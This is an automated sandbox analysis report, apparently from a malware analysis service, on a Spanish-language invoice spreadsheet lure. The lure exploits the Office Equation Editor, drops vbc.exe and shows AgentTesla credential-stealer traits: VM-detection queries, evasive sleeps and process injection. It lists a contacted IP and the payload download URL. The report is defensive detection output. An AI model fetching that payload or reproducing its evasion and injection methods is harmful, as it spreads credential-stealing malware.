Source: vbc.exe.4.dr, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.cs High entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
Source: vbc.exe.4.dr, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.cs High entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
Source: vbc.exe.4.dr, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.cs High entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
Source: 6.0.vbc.exe.ec0000.0.unpack, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
Source: 6.0.vbc.exe.ec0000.0.unpack, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
Source: 6.0.vbc.exe.ec0000.0.unpack, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.cs High entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
Source: 6.0.vbc.exe.ec0000.0.unpack, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
Source: 6.0.vbc.exe.ec0000.0.unpack, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
Source: 6.0.vbc.exe.ec0000.0.unpack, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
Source: 6.0.vbc.exe.ec0000.0.unpack, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.cs High entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
Source: 6.0.vbc.exe.ec0000.0.unpack, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
Source: 6.0.vbc.exe.ec0000.0.unpack, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.cs High entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
Source: 6.0.vbc.exe.ec0000.0.unpack, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.cs High entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
Source: 6.0.vbc.exe.ec0000.0.unpack, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.cs High entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
Source: 6.0.vbc.exe.ec0000.0.unpack, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.cs High entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
Source: 6.0.vbc.exe.ec0000.0.unpack, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.cs High entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
Source: 6.0.vbc.exe.ec0000.0.unpack, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.cs High entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: FACTURA 3879843.xlsx Stream path 'EncryptedPackage' entropy: 7.9986477778 (max. 8.0)

Malware Analysis System Evasion:

barindex
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9658 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2984 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2168 Thread sleep time: -39208s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1260 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2716 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2256 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2028 Thread sleep time: -17524406870024063s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2028 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2108 Thread sleep count: 9658 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2108 Thread sleep count: 74 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2028 Thread sleep count: 98 > 30 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\Public\vbc.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 39208 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000 Jump to behavior
Source: vbc.exe Binary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 452698 Sample: FACTURA 3879843.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 27 Multi AV Scanner detection for domain / URL 2->27 29 Found malware configuration 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 10 other signatures 2->33 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 34 30 2->12         started        process3 dnsIp4 25 198.12.91.148, 49167, 80 AS-COLOCROSSINGUS United States 7->25 19 C:\Users\user\AppData\Local\...\oso[1].exe, PE32 7->19 dropped 21 C:\Users\Public\vbc.exe, PE32 7->21 dropped 35 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->35 14 vbc.exe 7->14         started        23 C:\Users\user\...\~$FACTURA 3879843.xlsx, data 12->23 dropped file5 signatures6 process7 signatures8 37 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->37 39 Machine Learning detection for dropped file 14->39 41 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->41 43 Injects a PE file into a foreign processes 14->43 17 vbc.exe 2 14->17         started        process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.12.91.148
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://198.12.91.148/oso.exe true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown